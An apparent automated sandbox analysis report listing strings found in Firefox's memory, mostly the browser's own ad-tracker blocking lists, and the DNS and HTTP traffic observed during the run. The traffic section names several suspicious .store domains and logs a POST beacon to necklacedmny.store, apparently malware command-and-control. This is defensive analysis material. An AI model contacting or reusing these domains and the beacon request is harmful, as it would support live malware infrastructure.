Source: firefox.exe, 00000024.00000002.2958766234.000001DF2090E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]](' equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF20903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2911908216.000001DF1B061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000024.00000002.2911908216.000001DF1B061000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2090E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2958766234.000001DF20912000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]] equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF20912000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: [{incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null}, ["blocking"]]8& equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: chrome://global/skin/icons/edit-copy.svg.urlbarView-dynamic-unitConversion-output([0-2]?[0-9])(:([0-5][0-9]))?\s*([ap]m)?resource:///modules/QuickSuggest.sys.mjs"*://www.facebook.com/platform/impression.php*" equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2091B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2953297308.000001DF202C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2953297308.000001DF20284000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2959294479.000001DF20A74000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.facebook.com equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2953297308.000001DF20284000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: www.youtube.com- equals www.youtube.com (Youtube)
Source: firefox.exe, 00000024.00000002.2957011320.000001DF207C5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2959294479.000001DF20A93000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: x*://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF20903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2958766234.000001DF20903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: firefox.exe, 00000024.00000002.2911908216.000001DF1B05A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000024.00000002.2911908216.000001DF1B05A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId:
Source: firefox.exe, 00000024.00000002.2958766234.000001DF2090E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: {incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
Source: global traffic DNS traffic detected: DNS query: presticitpo.store
Source: global traffic DNS traffic detected: DNS query: crisiwarny.store
Source: global traffic DNS traffic detected: DNS query: fadehairucw.store
Source: global traffic DNS traffic detected: DNS query: thumbystriw.store
Source: global traffic DNS traffic detected: DNS query: necklacedmny.store
Source: global traffic DNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: youtube.com
Source: global traffic DNS traffic detected: DNS query: detectportal.firefox.com
Source: global traffic DNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: example.org
Source: global traffic DNS traffic detected: DNS query: ipv4only.arpa
Source: global traffic DNS traffic detected: DNS query: contile.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: spocs.getpocket.com
Source: global traffic DNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
Source: global traffic DNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
Source: global traffic DNS traffic detected: DNS query: shavar.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: push.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: firefox.settings.services.mozilla.com
Source: global traffic DNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: firefox.exe, 00000024.00000002.2957011320.000001DF207D0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2935278544.000001DF1ED63000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2963308821.000001DF20ECE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000024.00000002.2561696766.000001DF0EE6B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
